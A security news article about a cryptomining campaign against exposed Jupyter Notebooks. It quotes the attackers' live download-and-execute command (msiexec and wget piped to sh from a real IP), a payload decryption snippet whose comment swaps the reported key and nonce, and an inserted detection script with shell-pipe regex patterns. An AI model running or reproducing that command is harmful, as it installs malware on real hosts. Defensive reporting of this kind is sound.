Cyber Security News

Hackers Attacking Exposed Jupyter Notebooks To Deliver Cryptominer

A novel cryptomining campaign has been identified that exploits misconfigured Jupyter Notebooks, targeting both Windows and Linux systems.

The attack leverages exposed instances of Jupyter Notebook, an interactive application widely used by data scientists that includes a Python IDE, to deploy malicious code that installs cryptomining software on compromised systems.

The campaign begins by exploiting unsecured Jupyter environments to execute a command that attempts to install malware through multiple methods.

The initial payload attempts to download either an MSI file for Windows systems or a JavaScript file for Linux environments using the command: “(ipconfig && msiexec /i http://45.130.22.219/py0217.msi) || (wget -q -O- http://45.130.22.219/py0217.js|sh)”
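As an added example (not code from the article or from Cado's report): a small detection routine that flags the two branches of the command quoted above when they are spawned by a Jupyter kernel process. The event records, host names and paths are constructed; the parent-process heuristic assumes the telemetry carries the parent command line and that kernels are started via ipykernel_launcher.

```python
import re

# Constructed process-creation events (not from the article or Cado's report),
# modelled loosely on Sysmon Event ID 1 / EDR telemetry. Hosts and paths are
# invented; the two command lines are the ones quoted in the write-up.
SAMPLE_EVENTS = [
    {"host": "ds-win-01", "parent_cmd": "python.exe -m ipykernel_launcher -f kernel-1.json",
     "cmd": "msiexec /i http://45.130.22.219/py0217.msi"},
    {"host": "ds-lin-02", "parent_cmd": "python3 -m ipykernel_launcher -f kernel-2.json",
     "cmd": 'sh -c "wget -q -O- http://45.130.22.219/py0217.js|sh"'},
    {"host": "ds-lin-02", "parent_cmd": "python3 -m ipykernel_launcher -f kernel-2.json",
     "cmd": "pip install pandas"},                      # benign kernel activity
    {"host": "build-01", "parent_cmd": "explorer.exe",
     "cmd": r"msiexec /i C:\installers\tool.msi"},     # benign local MSI install
]

# Jupyter kernels are started as "python -m ipykernel_launcher ..." (assumption:
# the parent command line is present in the telemetry).
JUPYTER_KERNEL = re.compile(r"ipykernel_launcher|jupyter", re.I)
# msiexec pulling an installer straight from a URL, as in the Windows branch.
MSIEXEC_REMOTE = re.compile(r"msiexec(\.exe)?\s+/i\s+https?://", re.I)
# "download and pipe to a shell", as in the Linux branch.
DOWNLOAD_PIPE_SH = re.compile(r"\b(wget|curl)\b[^|]*https?://[^|]*\|\s*(ba)?sh\b", re.I)


def classify_event(ev):
    """Return the detection names that fire for one event (empty list = clean)."""
    findings = []
    if MSIEXEC_REMOTE.search(ev["cmd"]):
        findings.append("msiexec_remote_url")
    if DOWNLOAD_PIPE_SH.search(ev["cmd"]):
        findings.append("download_pipe_to_shell")
    # A kernel parent alone is not suspicious; it only raises severity when combined.
    if findings and JUPYTER_KERNEL.search(ev["parent_cmd"]):
        findings.insert(0, "spawned_by_jupyter_kernel")
    return findings


def triage(events):
    """Alerts for events with findings; 'high' when a Jupyter kernel is the parent."""
    alerts = []
    for ev in events:
        findings = classify_event(ev)
        if findings:
            severity = "high" if "spawned_by_jupyter_kernel" in findings else "medium"
            alerts.append({"host": ev["host"], "severity": severity, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```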

Analysts at Cado Security Labs identified this attack through their honeypot systems, noting that the campaign represents a new vector for cryptomining attacks that hasn’t been previously reported, despite sharing similarities with earlier campaigns targeting Ivanti Connect Secure and Korean web servers.

When targeting Windows systems, the attack downloads an MSI installer containing a 64-bit Windows executable named “Binary.freedllbinary.”

This binary loads a secondary payload called “java.exe” which is stored in c:\ProgramData. Despite its name, “java.exe” is actually a malicious binary packed with UPX that retrieves an encrypted blob called “x2.dat” from various repositories including GitHub, Launchpad, and Gitee.

Attack Chain

The attackers employ sophisticated encryption techniques to hide their payloads.

The “x2.dat” file is encrypted with ChaCha20 using the nonce “aQFabieiNxCjk6ygb1X61HpjGfSKq4zH” and the key “AZIzJi2WxU0G” before being compressed with zlib.

The code to decrypt this payload is as follows:

from Crypto.Cipher import ChaCha20   # PyCryptodome
import zlib

# Values as reported above. A ChaCha20 key is always 32 bytes and PyCryptodome
# accepts an 8-, 12- or 24-byte nonce, so the 32-character string is passed as
# the key and the 12-character string as the nonce for the routine to run.
key = b'aQFabieiNxCjk6ygb1X61HpjGfSKq4zH'
nonce = b'AZIzJi2WxU0G'

# Read the encrypted blob retrieved by java.exe
with open('x2.dat', 'rb') as f:
    ciphertext = f.read()

cipher = ChaCha20.new(key=key, nonce=nonce)
plaintext = cipher.decrypt(ciphertext)

# Decompress with zlib after decryption
decompressed_data = zlib.decompress(plaintext)

For Linux systems, the attack downloads a bash script “0217.js” that retrieves two ELF binaries and sets up cronjobs to ensure persistence.

Mining pool (Source – Cado Security)

The malware targets cryptocurrencies including Monero, Sumokoin, ArQma, and several others, using wallet ID “44Q4cH4jHoAZgyHiYBTU9D7rLsdV82y4EvPRkjgdMQThPLJVB3ZbD9Sc1i84Q9eHYgb9Ze7A3syWV”.

Organizations should implement strong authentication, disable public access to Jupyter instances, and regularly monitor cloud environments for unusual activity to mitigate these attacks.


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
